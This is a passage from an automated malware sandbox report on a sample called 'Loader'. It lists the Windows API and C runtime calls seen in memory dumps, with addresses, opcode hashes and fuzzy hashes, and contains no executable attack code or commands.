                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: fa6567375c21b59de27572fae9f6ce553544b4f205f329b87cbd08133f5be99f
                                                                                          • Instruction ID: c0d5511847f96dd9e7067bdcd1c1fc72786e63df5b4519fb723e11832b84fa20
                                                                                          • Opcode Fuzzy Hash: fa6567375c21b59de27572fae9f6ce553544b4f205f329b87cbd08133f5be99f
                                                                                          • Instruction Fuzzy Hash: D9018439940629EFDB139B50EC45FAEBBF8FB05B12F010625E811A62A0DB74A800CA90
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00336E6F
                                                                                          • __alloca_probe_16.LIBCMT ref: 00336F38
                                                                                          • __freea.LIBCMT ref: 00336F9F
                                                                                            • Part of subcall function 003356B1: HeapAlloc.KERNEL32(00000000,00337635,?,?,00337635,00000220,?,?,?), ref: 003356E3
                                                                                          • __freea.LIBCMT ref: 00336FB2
                                                                                          • __freea.LIBCMT ref: 00336FBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1096550386-0
                                                                                          • Opcode ID: de51947b728e4919af57dfe1cd0a94c718167b8bde213adfcc00fc8eb440f645
                                                                                          • Instruction ID: 0935bc0dcdd65d179d7e615509e28c55c42d1e6411cfc8462f3ff133af578565
                                                                                          • Opcode Fuzzy Hash: de51947b728e4919af57dfe1cd0a94c718167b8bde213adfcc00fc8eb440f645
                                                                                          • Instruction Fuzzy Hash: 00519172600206BFDB239E61ECC3EABBAA9DF44710F16812DFD05DB201EB71DC1096A0
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 003277B9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 003277C4
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00327832
                                                                                            • Part of subcall function 003276AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003276C7
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 003277DF
                                                                                          • _Yarn.LIBCPMT ref: 003277F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: fb14af988626b80cd22ba13bf44b734b5c77d6c083c7cfc91f43d7ee7bd6a1c8
                                                                                          • Instruction ID: 099251ce804f2185c58b59a94d1ae8aea9c1ad6e21ce91ae3e161f762c67a148
                                                                                          • Opcode Fuzzy Hash: fb14af988626b80cd22ba13bf44b734b5c77d6c083c7cfc91f43d7ee7bd6a1c8
                                                                                          • Instruction Fuzzy Hash: 0E015A79A045309BC707FF20E85667DBBA9BF85751F154049E8025B392DF38AE42CBC1
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0033F70C,00000000,?,00351E20,?,?,?,0033F643,00000004,InitializeCriticalSectionEx,003490D4,003490DC), ref: 0033F67D
                                                                                          • GetLastError.KERNEL32(?,0033F70C,00000000,?,00351E20,?,?,?,0033F643,00000004,InitializeCriticalSectionEx,003490D4,003490DC,00000000,?,0033535C), ref: 0033F687
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0033F6AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: a77e0c3dfda40c4e76f4010d69e1335fdd99483f662d6f9bad14af14d95056e7
                                                                                          • Instruction ID: da1af318075267929457468698caac69c5849df7ca4d5367058c5eaa07296067
                                                                                          • Opcode Fuzzy Hash: a77e0c3dfda40c4e76f4010d69e1335fdd99483f662d6f9bad14af14d95056e7
                                                                                          • Instruction Fuzzy Hash: ECE04F31B80208BBEF221B62EC8BB693F99AB11B51F544030F90CEC5F1DBB6BC509944
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 0033D771
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0033D9C3
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0033DA09
                                                                                          • GetLastError.KERNEL32 ref: 0033DAAC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 96f0df2b3df61f0e6d5bbed74a2cbd0c029448504f8ecd1daca0f0aea765d495
                                                                                          • Instruction ID: c97ae3ffe55881d7aa2ea1e589801fd792c09750d1a9ab735be70b27537c798d
                                                                                          • Opcode Fuzzy Hash: 96f0df2b3df61f0e6d5bbed74a2cbd0c029448504f8ecd1daca0f0aea765d495
                                                                                          • Instruction Fuzzy Hash: 59D15A75D042589FCF16CFA8D9C0AEDBBB9FF09314F24416AE456EB351E630A942CB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 9cf5cb795e276bdb9ece72258ac1a13eb82210cc1582aeaa145bb8f80025da94
                                                                                          • Instruction ID: 0f36c6c0b9de24b54d2a445dae6be7ef00d042e03ebb72b7ddea7f223fe4624b
                                                                                          • Opcode Fuzzy Hash: 9cf5cb795e276bdb9ece72258ac1a13eb82210cc1582aeaa145bb8f80025da94
                                                                                          • Instruction Fuzzy Hash: D751EF72604616AFDB2B8F14E8C1BAAB3B8EF40311F15456DE8858B690E731FC80CB90
                                                                                          APIs
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0033B59A
                                                                                          • __dosmaperr.LIBCMT ref: 0033B5A1
                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0033B5DB
                                                                                          • __dosmaperr.LIBCMT ref: 0033B5E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1913693674-0
                                                                                          • Opcode ID: d162ae35e26b645138df43992a6de4c67a359f0edc176c92112b08296593c8fa
                                                                                          • Instruction ID: f5fd6a269333927a284a3e2ed754f13fbbae4b8a3d220de32f73ed1de2ddc596
                                                                                          • Opcode Fuzzy Hash: d162ae35e26b645138df43992a6de4c67a359f0edc176c92112b08296593c8fa
                                                                                          • Instruction Fuzzy Hash: BB21D771600219EFEB12AF66D8C186BF7ADFF05364F118518FA19DB550DB30ED508B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 211ba87a4fa8f836cbb43104489fdf96be5810e0eeaa5e63018dbb0e942599f3
                                                                                          • Instruction ID: a3a4f81e72900beba9e485ff516f18264473dec5e7e17c223b933be253bb48bc
                                                                                          • Opcode Fuzzy Hash: 211ba87a4fa8f836cbb43104489fdf96be5810e0eeaa5e63018dbb0e942599f3
                                                                                          • Instruction Fuzzy Hash: BE21C33161022AAF9B22EF75EC8196FB7ACFF043A4B119514F819DB550DB30EC408B90
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0033C936
                                                                                            • Part of subcall function 003357C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00336F95,?,00000000,-00000008), ref: 00335822
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033C96E
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033C98E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: c70f2dc27a5ce265689e253f7493e1394e2cd5100d79650611be5f2f642bda87
                                                                                          • Instruction ID: b9e23c3a4684b0f88eb2fddafb935c62a2524f2350c7ca024fbc17dff3d4e221
                                                                                          • Opcode Fuzzy Hash: c70f2dc27a5ce265689e253f7493e1394e2cd5100d79650611be5f2f642bda87
                                                                                          • Instruction Fuzzy Hash: 6F11C0B6511A15BFAB1327B25CCAD7F7A9CEE96794F521029F802E9100FF209D0087B0
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000), ref: 00344467
                                                                                          • GetLastError.KERNEL32(?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?,?,?,0033D446,?), ref: 00344473
                                                                                            • Part of subcall function 003444D0: CloseHandle.KERNEL32(FFFFFFFE,00344483,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?,?), ref: 003444E0
                                                                                          • ___initconout.LIBCMT ref: 00344483
                                                                                            • Part of subcall function 003444A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00344441,0034398C,?,?,0033DB00,?,00000000,00000000,?), ref: 003444B8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0034399F,00000000,00000001,?,?,?,0033DB00,?,00000000,00000000,?), ref: 00344498
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 9880fee077bb2132693240697e7f69305b2b1b4ff4fe205246cccf2304da8577
                                                                                          • Instruction ID: a74fb539fd6841251618fd3680283328e42a474e8c5cc0cd158c1db3c780205b
                                                                                          • Opcode Fuzzy Hash: 9880fee077bb2132693240697e7f69305b2b1b4ff4fe205246cccf2304da8577
                                                                                          • Instruction Fuzzy Hash: D7F0C73A501219BBCF231F95EC49B993F6AFB457B5F164420F918AD230DB31A8209B91
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0032A307
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0032A316
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0032A31F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0032A32C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 9aed879b4f85cb294332b1b0ce205cc6b4cb2c73b29d28e4b8d92235567ea3e2
                                                                                          • Instruction ID: 8072c1c4ffaee046f2247faf683d345c0006d680c51fa4ff66ed92939a33d229
                                                                                          • Opcode Fuzzy Hash: 9aed879b4f85cb294332b1b0ce205cc6b4cb2c73b29d28e4b8d92235567ea3e2
                                                                                          • Instruction Fuzzy Hash: F0F0AF78C0020CEBCF05DBB4CA4898EBBF8FF1D300B914995E412EA110EB30AB449B50
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429939
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429A8C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: Xrsp
                                                                                          • API String ID: 237503144-748625766
                                                                                          • Opcode ID: fa13007f2bee2d67c54e7cf89fb10b18ac5bf56a918508bb9d97b2ce0acdbfc2
                                                                                          • Instruction ID: 4f4ecb18278d76325596eabc208a3bfd82e07ba985bdba3104b664f90404af25
                                                                                          • Opcode Fuzzy Hash: fa13007f2bee2d67c54e7cf89fb10b18ac5bf56a918508bb9d97b2ce0acdbfc2
                                                                                          • Instruction Fuzzy Hash: 146107B4E403155BDB009F7DC9423AEFFB2FB85211F59826EE8546B386C77458068BE2
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetACP.KERNEL32 ref: 0033A1A5
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0033A1DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: 2891e03d60d8d28ae73e3b59ca3afe83838d331533d0723071b3d3704b5c49cb
                                                                                          • Instruction ID: 6db3ef582a07c4584440792b9f5a19ca3c0ed278efdef9bfeaf7f297bb0e109b
                                                                                          • Opcode Fuzzy Hash: 2891e03d60d8d28ae73e3b59ca3afe83838d331533d0723071b3d3704b5c49cb
                                                                                          • Instruction Fuzzy Hash: D5510231A00F05AAEB27AB748CC2BA773ACEF05700F154929F995DF481EA75E9409762
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00335031,?,?,00000000,00000000,00000000,?), ref: 00335155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 56e6c73aa456c2549dd7c6d9ab4f5b3d389e9e3b036016a5d641a703e9359789
                                                                                          • Instruction ID: 8e27633386fecd2cf4d21b651b546f2c16142312321fd9d9e71b187408ddf24b
                                                                                          • Opcode Fuzzy Hash: 56e6c73aa456c2549dd7c6d9ab4f5b3d389e9e3b036016a5d641a703e9359789
                                                                                          • Instruction Fuzzy Hash: AF414871900609EFCF16DF94CC81AEEBBB5BF48300F154559FA09AB211D335AA91DB91
                                                                                          APIs
                                                                                            • Part of subcall function 00335677: HeapFree.KERNEL32(00000000,00000000,?,00339A24,?,00000000,?,?,003396C4,?,00000007,?,?,0033A00A,?,?), ref: 0033568D
                                                                                            • Part of subcall function 00335677: GetLastError.KERNEL32(?,?,00339A24,?,00000000,?,?,003396C4,?,00000007,?,?,0033A00A,?,?), ref: 00335698
                                                                                          • ___free_lconv_mon.LIBCMT ref: 00339E8E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID: 85$T5
                                                                                          • API String ID: 4068849827-221176244
                                                                                          • Opcode ID: a973c4dd2479bba30fb0ec4ce181bdd48b4e219bce88e473d364a484d8929767
                                                                                          • Instruction ID: a04f66271567ccc628d098c9b9bcac9e2eaf35ad44cc85d1809f12dd335a2e8d
                                                                                          • Opcode Fuzzy Hash: a973c4dd2479bba30fb0ec4ce181bdd48b4e219bce88e473d364a484d8929767
                                                                                          • Instruction Fuzzy Hash: 6E314F31604B01DFEB23AA38D8C6B6673E8AF00351F55581AF499DB1A1DFB6EC80CB14
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00334C13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: ac364b2fd964fa419b0410a51da2b29e4e9df203ca4d655c5a508d296b9d6ef7
                                                                                          • Instruction ID: 60df33fe794c6db1506547c589996e5f622e706403e908ef1704cb64c1400e25
                                                                                          • Opcode Fuzzy Hash: ac364b2fd964fa419b0410a51da2b29e4e9df203ca4d655c5a508d296b9d6ef7
                                                                                          • Instruction Fuzzy Hash: 2D31F376401218AFCF239F50CCC496E7B65FF09315F1A825AF8544A122C336ECA1DB91
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
